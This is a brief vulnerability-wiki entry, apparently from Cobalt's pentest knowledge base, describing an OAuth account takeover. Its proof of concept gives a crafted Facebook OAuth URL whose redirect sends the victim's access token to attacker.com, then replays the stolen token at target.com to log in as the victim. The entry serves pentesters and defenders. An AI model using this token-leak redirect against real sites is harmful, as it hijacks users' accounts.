Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

OAuth Account Takeover

POC

1.) Sign-in to a Facebook linked account. 2.) Visit: https://www.facebook.com/v2.8/dialog/oauth?appid=xxxx&clientid=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=enUS&origin=1&redirecturi=xxxxx/login?nextaction=//attacker.com&responsetype=token&scope=publicprofile%2Cemail&sdk=joey&version=v2.8 3.) You'll be redirected to attacker.com and your accesstoken will be leaked. 4.) Now start an incognito session and visit: https://target.com/auth/facebook-login?accesstoken=insertstolenaccesstoken_here 5.) You should be signed-in to the Facebook linked account now.

Impact

High

Likelihood

High